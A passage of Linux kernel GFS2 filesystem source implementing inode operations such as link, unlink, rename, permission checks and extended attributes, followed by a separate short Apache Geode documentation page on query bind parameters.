error = -EMLINK;
if (ip->i_inode.i_nlink == (u32)-1)
goto out_gunlock;
error = gfs2_diradd_alloc_required(dir, &dentry->d_name, &da);
if (error < 0)
goto out_gunlock;
if (da.nr_blocks) {
struct gfs2_alloc_parms ap = { .target = da.nr_blocks, };
error = gfs2_quota_lock_check(dip, &ap);
if (error)
goto out_gunlock;
error = gfs2_inplace_reserve(dip, &ap);
if (error)
goto out_gunlock_q;
error = gfs2_trans_begin(sdp, gfs2_trans_da_blks(dip, &da, 2), 0);
if (error)
goto out_ipres;
} else {
error = gfs2_trans_begin(sdp, 2 * RES_DINODE + RES_LEAF, 0);
if (error)
goto out_ipres;
}
error = gfs2_meta_inode_buffer(ip, &dibh);
if (error)
goto out_end_trans;
error = gfs2_dir_add(dir, &dentry->d_name, ip, &da);
if (error)
goto out_brelse;
gfs2_trans_add_meta(ip->i_gl, dibh);
inc_nlink(&ip->i_inode);
ip->i_inode.i_ctime = CURRENT_TIME;
ihold(inode);
d_instantiate(dentry, inode);
mark_inode_dirty(inode);
out_brelse:
brelse(dibh);
out_end_trans:
gfs2_trans_end(sdp);
out_ipres:
if (da.nr_blocks)
gfs2_inplace_release(dip);
out_gunlock_q:
if (da.nr_blocks)
gfs2_quota_unlock(dip);
out_gunlock:
gfs2_dir_no_add(&da);
gfs2_glock_dq(ghs + 1);
out_child:
gfs2_glock_dq(ghs);
out_parent:
gfs2_holder_uninit(ghs);
gfs2_holder_uninit(ghs + 1);
return error;
}
/*
* gfs2_unlink_ok - check to see that a inode is still in a directory
* @dip: the directory
* @name: the name of the file
* @ip: the inode
*
* Assumes that the lock on (at least) @dip is held.
*
* Returns: 0 if the parent/child relationship is correct, errno if it isn't
*/
static int gfs2_unlink_ok(struct gfs2_inode *dip, const struct qstr *name,
const struct gfs2_inode *ip)
{
int error;
if (IS_IMMUTABLE(&ip->i_inode) || IS_APPEND(&ip->i_inode))
return -EPERM;
if ((dip->i_inode.i_mode & S_ISVTX) &&
!uid_eq(dip->i_inode.i_uid, current_fsuid()) &&
!uid_eq(ip->i_inode.i_uid, current_fsuid()) && !capable(CAP_FOWNER))
return -EPERM;
if (IS_APPEND(&dip->i_inode))
return -EPERM;
error = gfs2_permission(&dip->i_inode, MAY_WRITE | MAY_EXEC);
if (error)
return error;
return gfs2_dir_check(&dip->i_inode, name, ip);
}
/**
* gfs2_unlink_inode - Removes an inode from its parent dir and unlinks it
* @dip: The parent directory
* @name: The name of the entry in the parent directory
* @inode: The inode to be removed
*
* Called with all the locks and in a transaction. This will only be
* called for a directory after it has been checked to ensure it is empty.
*
* Returns: 0 on success, or an error
*/
static int gfs2_unlink_inode(struct gfs2_inode *dip,
const struct dentry *dentry)
{
struct inode *inode = d_inode(dentry);
struct gfs2_inode *ip = GFS2_I(inode);
int error;
error = gfs2_dir_del(dip, dentry);
if (error)
return error;
ip->i_entries = 0;
inode->i_ctime = CURRENT_TIME;
if (S_ISDIR(inode->i_mode))
clear_nlink(inode);
else
drop_nlink(inode);
mark_inode_dirty(inode);
if (inode->i_nlink == 0)
gfs2_unlink_di(inode);
return 0;
}
/**
* gfs2_unlink - Unlink an inode (this does rmdir as well)
* @dir: The inode of the directory containing the inode to unlink
* @dentry: The file itself
*
* This routine uses the type of the inode as a flag to figure out
* whether this is an unlink or an rmdir.
*
* Returns: errno
*/
static int gfs2_unlink(struct inode *dir, struct dentry *dentry)
{
struct gfs2_inode *dip = GFS2_I(dir);
struct gfs2_sbd *sdp = GFS2_SB(dir);
struct inode *inode = d_inode(dentry);
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_holder ghs[3];
struct gfs2_rgrpd *rgd;
int error;
error = gfs2_rindex_update(sdp);
if (error)
return error;
error = -EROFS;
gfs2_holder_init(dip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + 1);
rgd = gfs2_blk2rgrpd(sdp, ip->i_no_addr, 1);
if (!rgd)
goto out_inodes;
gfs2_holder_init(rgd->rd_gl, LM_ST_EXCLUSIVE, 0, ghs + 2);
error = gfs2_glock_nq(ghs); /* parent */
if (error)
goto out_parent;
error = gfs2_glock_nq(ghs + 1); /* child */
if (error)
goto out_child;
error = -ENOENT;
if (inode->i_nlink == 0)
goto out_rgrp;
if (S_ISDIR(inode->i_mode)) {
error = -ENOTEMPTY;
if (ip->i_entries > 2 || inode->i_nlink > 2)
goto out_rgrp;
}
error = gfs2_glock_nq(ghs + 2); /* rgrp */
if (error)
goto out_rgrp;
error = gfs2_unlink_ok(dip, &dentry->d_name, ip);
if (error)
goto out_gunlock;
error = gfs2_trans_begin(sdp, 2*RES_DINODE + 3*RES_LEAF + RES_RG_BIT, 0);
if (error)
goto out_end_trans;
error = gfs2_unlink_inode(dip, dentry);
out_end_trans:
gfs2_trans_end(sdp);
out_gunlock:
gfs2_glock_dq(ghs + 2);
out_rgrp:
gfs2_glock_dq(ghs + 1);
out_child:
gfs2_glock_dq(ghs);
out_parent:
gfs2_holder_uninit(ghs + 2);
out_inodes:
gfs2_holder_uninit(ghs + 1);
gfs2_holder_uninit(ghs);
return error;
}
/**
* gfs2_symlink - Create a symlink
* @dir: The directory to create the symlink in
* @dentry: The dentry to put the symlink in
* @symname: The thing which the link points to
*
* Returns: errno
*/
static int gfs2_symlink(struct inode *dir, struct dentry *dentry,
const char *symname)
{
struct gfs2_sbd *sdp = GFS2_SB(dir);
unsigned int size;
size = strlen(symname);
if (size > sdp->sd_sb.sb_bsize - sizeof(struct gfs2_dinode) - 1)
return -ENAMETOOLONG;
return gfs2_create_inode(dir, dentry, NULL, S_IFLNK | S_IRWXUGO, 0, symname, size, 0, NULL);
}
/**
* gfs2_mkdir - Make a directory
* @dir: The parent directory of the new one
* @dentry: The dentry of the new directory
* @mode: The mode of the new directory
*
* Returns: errno
*/
static int gfs2_mkdir(struct inode *dir, struct dentry *dentry, umode_t mode)
{
struct gfs2_sbd *sdp = GFS2_SB(dir);
unsigned dsize = sdp->sd_sb.sb_bsize - sizeof(struct gfs2_dinode);
return gfs2_create_inode(dir, dentry, NULL, S_IFDIR | mode, 0, NULL, dsize, 0, NULL);
}
/**
* gfs2_mknod - Make a special file
* @dir: The directory in which the special file will reside
* @dentry: The dentry of the special file
* @mode: The mode of the special file
* @dev: The device specification of the special file
*
*/
static int gfs2_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
dev_t dev)
{
return gfs2_create_inode(dir, dentry, NULL, mode, dev, NULL, 0, 0, NULL);
}
/**
* gfs2_atomic_open - Atomically open a file
* @dir: The directory
* @dentry: The proposed new entry
* @file: The proposed new struct file
* @flags: open flags
* @mode: File mode
* @opened: Flag to say whether the file has been opened or not
*
* Returns: error code or 0 for success
*/
static int gfs2_atomic_open(struct inode *dir, struct dentry *dentry,
struct file *file, unsigned flags,
umode_t mode, int *opened)
{
struct dentry *d;
bool excl = !!(flags & O_EXCL);
if (!d_unhashed(dentry))
goto skip_lookup;
d = __gfs2_lookup(dir, dentry, file, opened);
if (IS_ERR(d))
return PTR_ERR(d);
if (d != NULL)
dentry = d;
if (d_really_is_positive(dentry)) {
if (!(*opened & FILE_OPENED))
return finish_no_open(file, d);
dput(d);
return 0;
}
BUG_ON(d != NULL);
skip_lookup:
if (!(flags & O_CREAT))
return -ENOENT;
return gfs2_create_inode(dir, dentry, file, S_IFREG | mode, 0, NULL, 0, excl, opened);
}
/*
* gfs2_ok_to_move - check if it's ok to move a directory to another directory
* @this: move this
* @to: to here
*
* Follow @to back to the root and make sure we don't encounter @this
* Assumes we already hold the rename lock.
*
* Returns: errno
*/
static int gfs2_ok_to_move(struct gfs2_inode *this, struct gfs2_inode *to)
{
struct inode *dir = &to->i_inode;
struct super_block *sb = dir->i_sb;
struct inode *tmp;
int error = 0;
igrab(dir);
for (;;) {
if (dir == &this->i_inode) {
error = -EINVAL;
break;
}
if (dir == d_inode(sb->s_root)) {
error = 0;
break;
}
tmp = gfs2_lookupi(dir, &gfs2_qdotdot, 1);
if (!tmp) {
error = -ENOENT;
break;
}
if (IS_ERR(tmp)) {
error = PTR_ERR(tmp);
break;
}
iput(dir);
dir = tmp;
}
iput(dir);
return error;
}
/**
* update_moved_ino - Update an inode that's being moved
* @ip: The inode being moved
* @ndip: The parent directory of the new filename
* @dir_rename: True of ip is a directory
*
* Returns: errno
*/
static int update_moved_ino(struct gfs2_inode *ip, struct gfs2_inode *ndip,
int dir_rename)
{
int error;
struct buffer_head *dibh;
if (dir_rename)
return gfs2_dir_mvino(ip, &gfs2_qdotdot, ndip, DT_DIR);
error = gfs2_meta_inode_buffer(ip, &dibh);
if (error)
return error;
ip->i_inode.i_ctime = CURRENT_TIME;
gfs2_trans_add_meta(ip->i_gl, dibh);
gfs2_dinode_out(ip, dibh->b_data);
brelse(dibh);
return 0;
}
/**
* gfs2_rename - Rename a file
* @odir: Parent directory of old file name
* @odentry: The old dentry of the file
* @ndir: Parent directory of new file name
* @ndentry: The new dentry of the file
*
* Returns: errno
*/
static int gfs2_rename(struct inode *odir, struct dentry *odentry,
struct inode *ndir, struct dentry *ndentry)
{
struct gfs2_inode *odip = GFS2_I(odir);
struct gfs2_inode *ndip = GFS2_I(ndir);
struct gfs2_inode *ip = GFS2_I(d_inode(odentry));
struct gfs2_inode *nip = NULL;
struct gfs2_sbd *sdp = GFS2_SB(odir);
struct gfs2_holder ghs[5], r_gh = { .gh_gl = NULL, };
struct gfs2_rgrpd *nrgd;
unsigned int num_gh;
int dir_rename = 0;
struct gfs2_diradd da = { .nr_blocks = 0, .save_loc = 0, };
unsigned int x;
int error;
if (d_really_is_positive(ndentry)) {
nip = GFS2_I(d_inode(ndentry));
if (ip == nip)
return 0;
}
error = gfs2_rindex_update(sdp);
if (error)
return error;
error = gfs2_rs_alloc(ndip);
if (error)
return error;
if (odip != ndip) {
error = gfs2_glock_nq_init(sdp->sd_rename_gl, LM_ST_EXCLUSIVE,
0, &r_gh);
if (error)
goto out;
if (S_ISDIR(ip->i_inode.i_mode)) {
dir_rename = 1;
/* don't move a directory into its subdir */
error = gfs2_ok_to_move(ip, ndip);
if (error)
goto out_gunlock_r;
}
}
num_gh = 1;
gfs2_holder_init(odip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
if (odip != ndip) {
gfs2_holder_init(ndip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
num_gh++;
}
gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
num_gh++;
if (nip) {
gfs2_holder_init(nip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
num_gh++;
/* grab the resource lock for unlink flag twiddling
* this is the case of the target file already existing
* so we unlink before doing the rename
*/
nrgd = gfs2_blk2rgrpd(sdp, nip->i_no_addr, 1);
if (nrgd)
gfs2_holder_init(nrgd->rd_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh++);
}
for (x = 0; x < num_gh; x++) {
error = gfs2_glock_nq(ghs + x);
if (error)
goto out_gunlock;
}
error = -ENOENT;
if (ip->i_inode.i_nlink == 0)
goto out_gunlock;
/* Check out the old directory */
error = gfs2_unlink_ok(odip, &odentry->d_name, ip);
if (error)
goto out_gunlock;
/* Check out the new directory */
if (nip) {
error = gfs2_unlink_ok(ndip, &ndentry->d_name, nip);
if (error)
goto out_gunlock;
if (nip->i_inode.i_nlink == 0) {
error = -EAGAIN;
goto out_gunlock;
}
if (S_ISDIR(nip->i_inode.i_mode)) {
if (nip->i_entries < 2) {
gfs2_consist_inode(nip);
error = -EIO;
goto out_gunlock;
}
if (nip->i_entries > 2) {
error = -ENOTEMPTY;
goto out_gunlock;
}
}
} else {
error = gfs2_permission(ndir, MAY_WRITE | MAY_EXEC);
if (error)
goto out_gunlock;
error = gfs2_dir_check(ndir, &ndentry->d_name, NULL);
switch (error) {
case -ENOENT:
error = 0;
break;
case 0:
error = -EEXIST;
default:
goto out_gunlock;
};
if (odip != ndip) {
if (!ndip->i_inode.i_nlink) {
error = -ENOENT;
goto out_gunlock;
}
if (ndip->i_entries == (u32)-1) {
error = -EFBIG;
goto out_gunlock;
}
if (S_ISDIR(ip->i_inode.i_mode) &&
ndip->i_inode.i_nlink == (u32)-1) {
error = -EMLINK;
goto out_gunlock;
}
}
}
/* Check out the dir to be renamed */
if (dir_rename) {
error = gfs2_permission(d_inode(odentry), MAY_WRITE);
if (error)
goto out_gunlock;
}
if (nip == NULL) {
error = gfs2_diradd_alloc_required(ndir, &ndentry->d_name, &da);
if (error)
goto out_gunlock;
}
if (da.nr_blocks) {
struct gfs2_alloc_parms ap = { .target = da.nr_blocks, };
error = gfs2_quota_lock_check(ndip, &ap);
if (error)
goto out_gunlock;
error = gfs2_inplace_reserve(ndip, &ap);
if (error)
goto out_gunlock_q;
error = gfs2_trans_begin(sdp, gfs2_trans_da_blks(ndip, &da, 4) +
4 * RES_LEAF + 4, 0);
if (error)
goto out_ipreserv;
} else {
error = gfs2_trans_begin(sdp, 4 * RES_DINODE +
5 * RES_LEAF + 4, 0);
if (error)
goto out_gunlock;
}
/* Remove the target file, if it exists */
if (nip)
error = gfs2_unlink_inode(ndip, ndentry);
error = update_moved_ino(ip, ndip, dir_rename);
if (error)
goto out_end_trans;
error = gfs2_dir_del(odip, odentry);
if (error)
goto out_end_trans;
error = gfs2_dir_add(ndir, &ndentry->d_name, ip, &da);
if (error)
goto out_end_trans;
out_end_trans:
gfs2_trans_end(sdp);
out_ipreserv:
if (da.nr_blocks)
gfs2_inplace_release(ndip);
out_gunlock_q:
if (da.nr_blocks)
gfs2_quota_unlock(ndip);
out_gunlock:
gfs2_dir_no_add(&da);
while (x--) {
gfs2_glock_dq(ghs + x);
gfs2_holder_uninit(ghs + x);
}
out_gunlock_r:
if (r_gh.gh_gl)
gfs2_glock_dq_uninit(&r_gh);
out:
return error;
}
/**
* gfs2_exchange - exchange two files
* @odir: Parent directory of old file name
* @odentry: The old dentry of the file
* @ndir: Parent directory of new file name
* @ndentry: The new dentry of the file
* @flags: The rename flags
*
* Returns: errno
*/
static int gfs2_exchange(struct inode *odir, struct dentry *odentry,
struct inode *ndir, struct dentry *ndentry,
unsigned int flags)
{
struct gfs2_inode *odip = GFS2_I(odir);
struct gfs2_inode *ndip = GFS2_I(ndir);
struct gfs2_inode *oip = GFS2_I(odentry->d_inode);
struct gfs2_inode *nip = GFS2_I(ndentry->d_inode);
struct gfs2_sbd *sdp = GFS2_SB(odir);
struct gfs2_holder ghs[5], r_gh = { .gh_gl = NULL, };
unsigned int num_gh;
unsigned int x;
umode_t old_mode = oip->i_inode.i_mode;
umode_t new_mode = nip->i_inode.i_mode;
int error;
error = gfs2_rindex_update(sdp);
if (error)
return error;
if (odip != ndip) {
error = gfs2_glock_nq_init(sdp->sd_rename_gl, LM_ST_EXCLUSIVE,
0, &r_gh);
if (error)
goto out;
if (S_ISDIR(old_mode)) {
/* don't move a directory into its subdir */
error = gfs2_ok_to_move(oip, ndip);
if (error)
goto out_gunlock_r;
}
if (S_ISDIR(new_mode)) {
/* don't move a directory into its subdir */
error = gfs2_ok_to_move(nip, odip);
if (error)
goto out_gunlock_r;
}
}
num_gh = 1;
gfs2_holder_init(odip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
if (odip != ndip) {
gfs2_holder_init(ndip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
num_gh++;
}
gfs2_holder_init(oip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
num_gh++;
gfs2_holder_init(nip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
num_gh++;
for (x = 0; x < num_gh; x++) {
error = gfs2_glock_nq(ghs + x);
if (error)
goto out_gunlock;
}
error = -ENOENT;
if (oip->i_inode.i_nlink == 0 || nip->i_inode.i_nlink == 0)
goto out_gunlock;
error = gfs2_unlink_ok(odip, &odentry->d_name, oip);
if (error)
goto out_gunlock;
error = gfs2_unlink_ok(ndip, &ndentry->d_name, nip);
if (error)
goto out_gunlock;
if (S_ISDIR(old_mode)) {
error = gfs2_permission(odentry->d_inode, MAY_WRITE);
if (error)
goto out_gunlock;
}
if (S_ISDIR(new_mode)) {
error = gfs2_permission(ndentry->d_inode, MAY_WRITE);
if (error)
goto out_gunlock;
}
error = gfs2_trans_begin(sdp, 4 * RES_DINODE + 4 * RES_LEAF, 0);
if (error)
goto out_gunlock;
error = update_moved_ino(oip, ndip, S_ISDIR(old_mode));
if (error)
goto out_end_trans;
error = update_moved_ino(nip, odip, S_ISDIR(new_mode));
if (error)
goto out_end_trans;
error = gfs2_dir_mvino(ndip, &ndentry->d_name, oip,
IF2DT(old_mode));
if (error)
goto out_end_trans;
error = gfs2_dir_mvino(odip, &odentry->d_name, nip,
IF2DT(new_mode));
if (error)
goto out_end_trans;
if (odip != ndip) {
if (S_ISDIR(new_mode) && !S_ISDIR(old_mode)) {
inc_nlink(&odip->i_inode);
drop_nlink(&ndip->i_inode);
} else if (S_ISDIR(old_mode) && !S_ISDIR(new_mode)) {
inc_nlink(&ndip->i_inode);
drop_nlink(&odip->i_inode);
}
}
mark_inode_dirty(&ndip->i_inode);
if (odip != ndip)
mark_inode_dirty(&odip->i_inode);
out_end_trans:
gfs2_trans_end(sdp);
out_gunlock:
while (x--) {
gfs2_glock_dq(ghs + x);
gfs2_holder_uninit(ghs + x);
}
out_gunlock_r:
if (r_gh.gh_gl)
gfs2_glock_dq_uninit(&r_gh);
out:
return error;
}
static int gfs2_rename2(struct inode *odir, struct dentry *odentry,
struct inode *ndir, struct dentry *ndentry,
unsigned int flags)
{
flags &= ~RENAME_NOREPLACE;
if (flags & ~RENAME_EXCHANGE)
return -EINVAL;
if (flags & RENAME_EXCHANGE)
return gfs2_exchange(odir, odentry, ndir, ndentry, flags);
return gfs2_rename(odir, odentry, ndir, ndentry);
}
/**
* gfs2_follow_link - Follow a symbolic link
* @dentry: The dentry of the link
* @nd: Data that we pass to vfs_follow_link()
*
* This can handle symlinks of any size.
*
* Returns: 0 on success or error code
*/
static const char *gfs2_follow_link(struct dentry *dentry, void **cookie)
{
struct gfs2_inode *ip = GFS2_I(d_inode(dentry));
struct gfs2_holder i_gh;
struct buffer_head *dibh;
unsigned int size;
char *buf;
int error;
gfs2_holder_init(ip->i_gl, LM_ST_SHARED, 0, &i_gh);
error = gfs2_glock_nq(&i_gh);
if (error) {
gfs2_holder_uninit(&i_gh);
return ERR_PTR(error);
}
size = (unsigned int)i_size_read(&ip->i_inode);
if (size == 0) {
gfs2_consist_inode(ip);
buf = ERR_PTR(-EIO);
goto out;
}
error = gfs2_meta_inode_buffer(ip, &dibh);
if (error) {
buf = ERR_PTR(error);
goto out;
}
buf = kzalloc(size + 1, GFP_NOFS);
if (!buf)
buf = ERR_PTR(-ENOMEM);
else
memcpy(buf, dibh->b_data + sizeof(struct gfs2_dinode), size);
brelse(dibh);
out:
gfs2_glock_dq_uninit(&i_gh);
if (!IS_ERR(buf))
*cookie = buf;
return buf;
}
/**
* gfs2_permission -
* @inode: The inode
* @mask: The mask to be tested
* @flags: Indicates whether this is an RCU path walk or not
*
* This may be called from the VFS directly, or from within GFS2 with the
* inode locked, so we look to see if the glock is already locked and only
* lock the glock if its not already been done.
*
* Returns: errno
*/
int gfs2_permission(struct inode *inode, int mask)
{
struct gfs2_inode *ip;
struct gfs2_holder i_gh;
int error;
int unlock = 0;
ip = GFS2_I(inode);
if (gfs2_glock_is_locked_by_me(ip->i_gl) == NULL) {
if (mask & MAY_NOT_BLOCK)
return -ECHILD;
error = gfs2_glock_nq_init(ip->i_gl, LM_ST_SHARED, LM_FLAG_ANY, &i_gh);
if (error)
return error;
unlock = 1;
}
if ((mask & MAY_WRITE) && IS_IMMUTABLE(inode))
error = -EACCES;
else
error = generic_permission(inode, mask);
if (unlock)
gfs2_glock_dq_uninit(&i_gh);
return error;
}
static int __gfs2_setattr_simple(struct inode *inode, struct iattr *attr)
{
setattr_copy(inode, attr);
mark_inode_dirty(inode);
return 0;
}
/**
* gfs2_setattr_simple -
* @ip:
* @attr:
*
* Returns: errno
*/
int gfs2_setattr_simple(struct inode *inode, struct iattr *attr)
{
int error;
if (current->journal_info)
return __gfs2_setattr_simple(inode, attr);
error = gfs2_trans_begin(GFS2_SB(inode), RES_DINODE, 0);
if (error)
return error;
error = __gfs2_setattr_simple(inode, attr);
gfs2_trans_end(GFS2_SB(inode));
return error;
}
static int setattr_chown(struct inode *inode, struct iattr *attr)
{
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_sbd *sdp = GFS2_SB(inode);
kuid_t ouid, nuid;
kgid_t ogid, ngid;
int error;
struct gfs2_alloc_parms ap;
ouid = inode->i_uid;
ogid = inode->i_gid;
nuid = attr->ia_uid;
ngid = attr->ia_gid;
if (!(attr->ia_valid & ATTR_UID) || uid_eq(ouid, nuid))
ouid = nuid = NO_UID_QUOTA_CHANGE;
if (!(attr->ia_valid & ATTR_GID) || gid_eq(ogid, ngid))
ogid = ngid = NO_GID_QUOTA_CHANGE;
error = get_write_access(inode);
if (error)
return error;
error = gfs2_rs_alloc(ip);
if (error)
goto out;
error = gfs2_rindex_update(sdp);
if (error)
goto out;
error = gfs2_quota_lock(ip, nuid, ngid);
if (error)
goto out;
ap.target = gfs2_get_inode_blocks(&ip->i_inode);
if (!uid_eq(ouid, NO_UID_QUOTA_CHANGE) ||
!gid_eq(ogid, NO_GID_QUOTA_CHANGE)) {
error = gfs2_quota_check(ip, nuid, ngid, &ap);
if (error)
goto out_gunlock_q;
}
error = gfs2_trans_begin(sdp, RES_DINODE + 2 * RES_QUOTA, 0);
if (error)
goto out_gunlock_q;
error = gfs2_setattr_simple(inode, attr);
if (error)
goto out_end_trans;
if (!uid_eq(ouid, NO_UID_QUOTA_CHANGE) ||
!gid_eq(ogid, NO_GID_QUOTA_CHANGE)) {
gfs2_quota_change(ip, -(s64)ap.target, ouid, ogid);
gfs2_quota_change(ip, ap.target, nuid, ngid);
}
out_end_trans:
gfs2_trans_end(sdp);
out_gunlock_q:
gfs2_quota_unlock(ip);
out:
put_write_access(inode);
return error;
}
/**
* gfs2_setattr - Change attributes on an inode
* @dentry: The dentry which is changing
* @attr: The structure describing the change
*
* The VFS layer wants to change one or more of an inodes attributes. Write
* that change out to disk.
*
* Returns: errno
*/
static int gfs2_setattr(struct dentry *dentry, struct iattr *attr)
{
struct inode *inode = d_inode(dentry);
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_holder i_gh;
int error;
error = gfs2_rs_alloc(ip);
if (error)
return error;
error = gfs2_glock_nq_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, &i_gh);
if (error)
return error;
error = -EPERM;
if (IS_IMMUTABLE(inode) || IS_APPEND(inode))
goto out;
error = inode_change_ok(inode, attr);
if (error)
goto out;
if (attr->ia_valid & ATTR_SIZE)
error = gfs2_setattr_size(inode, attr->ia_size);
else if (attr->ia_valid & (ATTR_UID | ATTR_GID))
error = setattr_chown(inode, attr);
else {
error = gfs2_setattr_simple(inode, attr);
if (!error && attr->ia_valid & ATTR_MODE)
error = posix_acl_chmod(inode, inode->i_mode);
}
out:
if (!error)
mark_inode_dirty(inode);
gfs2_glock_dq_uninit(&i_gh);
return error;
}
/**
* gfs2_getattr - Read out an inode's attributes
* @mnt: The vfsmount the inode is being accessed from
* @dentry: The dentry to stat
* @stat: The inode's stats
*
* This may be called from the VFS directly, or from within GFS2 with the
* inode locked, so we look to see if the glock is already locked and only
* lock the glock if its not already been done. Note that its the NFS
* readdirplus operation which causes this to be called (from filldir)
* with the glock already held.
*
* Returns: errno
*/
static int gfs2_getattr(struct vfsmount *mnt, struct dentry *dentry,
struct kstat *stat)
{
struct inode *inode = d_inode(dentry);
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_holder gh;
int error;
int unlock = 0;
if (gfs2_glock_is_locked_by_me(ip->i_gl) == NULL) {
error = gfs2_glock_nq_init(ip->i_gl, LM_ST_SHARED, LM_FLAG_ANY, &gh);
if (error)
return error;
unlock = 1;
}
generic_fillattr(inode, stat);
if (unlock)
gfs2_glock_dq_uninit(&gh);
return 0;
}
static int gfs2_setxattr(struct dentry *dentry, const char *name,
const void *data, size_t size, int flags)
{
struct inode *inode = d_inode(dentry);
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_holder gh;
int ret;
gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, &gh);
ret = gfs2_glock_nq(&gh);
if (ret == 0) {
ret = gfs2_rs_alloc(ip);
if (ret == 0)
ret = generic_setxattr(dentry, name, data, size, flags);
gfs2_glock_dq(&gh);
}
gfs2_holder_uninit(&gh);
return ret;
}
static ssize_t gfs2_getxattr(struct dentry *dentry, const char *name,
void *data, size_t size)
{
struct inode *inode = d_inode(dentry);
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_holder gh;
int ret;
/* For selinux during lookup */
if (gfs2_glock_is_locked_by_me(ip->i_gl))
return generic_getxattr(dentry, name, data, size);
gfs2_holder_init(ip->i_gl, LM_ST_SHARED, LM_FLAG_ANY, &gh);
ret = gfs2_glock_nq(&gh);
if (ret == 0) {
ret = generic_getxattr(dentry, name, data, size);
gfs2_glock_dq(&gh);
}
gfs2_holder_uninit(&gh);
return ret;
}
static int gfs2_removexattr(struct dentry *dentry, const char *name)
{
struct inode *inode = d_inode(dentry);
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_holder gh;
int ret;
gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, &gh);
ret = gfs2_glock_nq(&gh);
if (ret == 0) {
ret = gfs2_rs_alloc(ip);
if (ret == 0)
ret = generic_removexattr(dentry, name);
gfs2_glock_dq(&gh);
}
gfs2_holder_uninit(&gh);
return ret;
}
static int gfs2_fiemap(struct inode *inode, struct fiemap_extent_info *fieinfo,
u64 start, u64 len)
{
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_holder gh;
int ret;
ret = fiemap_check_flags(fieinfo, FIEMAP_FLAG_SYNC);
if (ret)
return ret;
mutex_lock(&inode->i_mutex);
ret = gfs2_glock_nq_init(ip->i_gl, LM_ST_SHARED, 0, &gh);
if (ret)
goto out;
if (gfs2_is_stuffed(ip)) {
u64 phys = ip->i_no_addr << inode->i_blkbits;
u64 size = i_size_read(inode);
u32 flags = FIEMAP_EXTENT_LAST|FIEMAP_EXTENT_NOT_ALIGNED|
FIEMAP_EXTENT_DATA_INLINE;
phys += sizeof(struct gfs2_dinode);
phys += start;
if (start + len > size)
len = size - start;
if (start < size)
ret = fiemap_fill_next_extent(fieinfo, start, phys,
len, flags);
if (ret == 1)
ret = 0;
} else {
ret = __generic_block_fiemap(inode, fieinfo, start, len,
gfs2_block_map);
}
gfs2_glock_dq_uninit(&gh);
out:
mutex_unlock(&inode->i_mutex);
return ret;
}
const struct inode_operations gfs2_file_iops = {
.permission = gfs2_permission,
.setattr = gfs2_setattr,
.getattr = gfs2_getattr,
.setxattr = gfs2_setxattr,
.getxattr = gfs2_getxattr,
.listxattr = gfs2_listxattr,
.removexattr = gfs2_removexattr,
.fiemap = gfs2_fiemap,
.get_acl = gfs2_get_acl,
.set_acl = gfs2_set_acl,
};
const struct inode_operations gfs2_dir_iops = {
.create = gfs2_create,
.lookup = gfs2_lookup,
.link = gfs2_link,
.unlink = gfs2_unlink,
.symlink = gfs2_symlink,
.mkdir = gfs2_mkdir,
.rmdir = gfs2_unlink,
.mknod = gfs2_mknod,
.rename2 = gfs2_rename2,
.permission = gfs2_permission,
.setattr = gfs2_setattr,
.getattr = gfs2_getattr,
.setxattr = gfs2_setxattr,
.getxattr = gfs2_getxattr,
.listxattr = gfs2_listxattr,
.removexattr = gfs2_removexattr,
.fiemap = gfs2_fiemap,
.get_acl = gfs2_get_acl,
.set_acl = gfs2_set_acl,
.atomic_open = gfs2_atomic_open,
};
const struct inode_operations gfs2_symlink_iops = {
.readlink = generic_readlink,
.follow_link = gfs2_follow_link,
.put_link = kfree_put_link,
.permission = gfs2_permission,
.setattr = gfs2_setattr,
.getattr = gfs2_getattr,
.setxattr = gfs2_setxattr,
.getxattr = gfs2_getxattr,
.listxattr = gfs2_listxattr,
.removexattr = gfs2_removexattr,
.fiemap = gfs2_fiemap,
};
| {
"pile_set_name": "Github"
} |
---
title: Using Query Bind Parameters
---
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
Using query bind parameters in <%=vars.product_name%> queries is similar to using prepared statements in SQL where parameters can be set during query execution. This allows user to build a query once and execute it multiple times by passing the query conditions during run time.
Query objects are thread-safe.
The use of query bind parameters is now supported in Client-to-Server queries.
The query parameters are identified by a dollar sign, $, followed by a digit that represents the parameter's position in the parameter array passed to the execute method. Counting begins at 1, so $1 references the first bound attribute, $2 the second attribute, and so on.
The Query interface provides an overloaded execute method that accepts parameters inside an Object array. See the [Query.execute](/releases/latest/javadoc/org/apache/geode/cache/query/Query.html) JavaDocs for more details.
The 0th element of the Object array is used for the first query parameter, and so on. If the parameter count or parameter types do not match the query specification, the execute method throws an exception. Specifically, if you pass in the wrong number of parameters, the method call throws a `QueryParameterCountInvalidException`. If a parameter object type is not compatible with what is expected, the method call throws a `TypeMismatchException`.
